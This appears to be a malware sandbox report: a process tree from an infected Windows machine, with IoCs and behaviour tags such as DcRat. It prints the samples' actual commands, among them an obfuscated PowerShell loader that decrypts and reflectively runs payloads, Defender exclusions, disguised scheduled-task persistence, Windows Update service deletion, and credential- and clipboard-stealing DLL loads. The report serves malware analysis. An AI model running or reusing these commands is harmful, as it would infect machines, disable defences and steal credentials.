Explorer.EXED97C.exeD97C.exeD97C.exeD97C.exebuild3.exeD05.exePlayer3.exenbveek.exedescription pid process target process PID 2172 wrote to memory of 2136 2172 Explorer.EXE D97C.exe PID 2172 wrote to memory of 2136 2172 Explorer.EXE D97C.exe PID 2172 wrote to memory of 2136 2172 Explorer.EXE D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2172 wrote to memory of 2348 2172 Explorer.EXE DDD3.exe PID 2172 wrote to memory of 2348 2172 Explorer.EXE DDD3.exe PID 2172 wrote to memory of 2348 2172 Explorer.EXE DDD3.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2136 wrote to memory of 4232 2136 D97C.exe D97C.exe PID 2172 wrote to memory of 832 2172 Explorer.EXE DF6A.exe PID 2172 wrote to memory of 832 2172 Explorer.EXE DF6A.exe PID 2172 wrote to memory of 832 2172 Explorer.EXE DF6A.exe PID 4232 wrote to memory of 1928 4232 D97C.exe icacls.exe PID 4232 wrote to memory of 1928 4232 D97C.exe icacls.exe PID 4232 wrote to memory of 1928 4232 D97C.exe icacls.exe PID 4232 wrote to memory of 5088 4232 D97C.exe D97C.exe PID 4232 wrote to memory of 5088 4232 D97C.exe D97C.exe PID 4232 wrote to memory of 5088 4232 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 5088 wrote to memory of 3748 5088 D97C.exe D97C.exe PID 2172 wrote to memory of 3136 2172 Explorer.EXE F67D.exe PID 2172 wrote to memory of 3136 2172 Explorer.EXE F67D.exe PID 2172 wrote to memory of 3136 2172 Explorer.EXE F67D.exe PID 2172 wrote to memory of 3572 2172 Explorer.EXE F863.exe PID 2172 wrote to memory of 3572 2172 Explorer.EXE F863.exe PID 2172 wrote to memory of 3572 2172 Explorer.EXE F863.exe PID 3748 wrote to memory of 2796 3748 D97C.exe build3.exe PID 3748 wrote to memory of 2796 3748 D97C.exe build3.exe PID 3748 wrote to memory of 2796 3748 D97C.exe build3.exe PID 2796 wrote to memory of 384 2796 build3.exe schtasks.exe PID 2796 wrote to memory of 384 2796 build3.exe schtasks.exe PID 2796 wrote to memory of 384 2796 build3.exe schtasks.exe PID 2172 wrote to memory of 100 2172 Explorer.EXE D05.exe PID 2172 wrote to memory of 100 2172 Explorer.EXE D05.exe PID 2172 wrote to memory of 100 2172 Explorer.EXE D05.exe PID 100 wrote to memory of 396 100 D05.exe Player3.exe PID 100 wrote to memory of 396 100 D05.exe Player3.exe PID 100 wrote to memory of 396 100 D05.exe Player3.exe PID 100 wrote to memory of 3872 100 D05.exe ss31.exe PID 100 wrote to memory of 3872 100 D05.exe ss31.exe PID 396 wrote to memory of 4936 396 Player3.exe nbveek.exe PID 396 wrote to memory of 4936 396 Player3.exe nbveek.exe PID 396 wrote to memory of 4936 396 Player3.exe nbveek.exe PID 100 wrote to memory of 4008 100 D05.exe XandETC.exe PID 100 wrote to memory of 4008 100 D05.exe XandETC.exe PID 4936 wrote to memory of 3328 4936 nbveek.exe schtasks.exe PID 4936 wrote to memory of 3328 4936 nbveek.exe schtasks.exe PID 4936 wrote to memory of 3328 4936 nbveek.exe schtasks.exe PID 2172 wrote to memory of 1412 2172 Explorer.EXE 1737.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\D97C.exeC:\Users\Admin\AppData\Local\Temp\D97C.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D97C.exeC:\Users\Admin\AppData\Local\Temp\D97C.exe3⤵
- DcRat
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\2f93599c-985f-4394-9efd-355ec48635b4" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\D97C.exe"C:\Users\Admin\AppData\Local\Temp\D97C.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D97C.exe"C:\Users\Admin\AppData\Local\Temp\D97C.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\f84f54cb-a1d1-4455-8ef3-853e11585eba\build3.exe"C:\Users\Admin\AppData\Local\f84f54cb-a1d1-4455-8ef3-853e11585eba\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\DDD3.exeC:\Users\Admin\AppData\Local\Temp\DDD3.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\DF6A.exeC:\Users\Admin\AppData\Local\Temp\DF6A.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 3403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\F67D.exeC:\Users\Admin\AppData\Local\Temp\F67D.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\F863.exeC:\Users\Admin\AppData\Local\Temp\F863.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 3403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\D05.exeC:\Users\Admin\AppData\Local\Temp\D05.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4160 -s 6487⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1737.exeC:\Users\Admin\AppData\Local\Temp\1737.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 14883⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\57EB.exeC:\Users\Admin\AppData\Local\Temp\57EB.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7FD7.bat" "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7FD7.bat.exe"C:\Users\Admin\AppData\Local\Temp\7FD7.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4876);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\7FD7')4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #6⤵
-
C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe"C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;6⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4184);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')7⤵
-
C:\Users\Admin\AppData\Local\Temp\638196.exe"C:\Users\Admin\AppData\Local\Temp\638196.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1800);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BC83.exeC:\Users\Admin\AppData\Local\Temp\BC83.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 7283⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
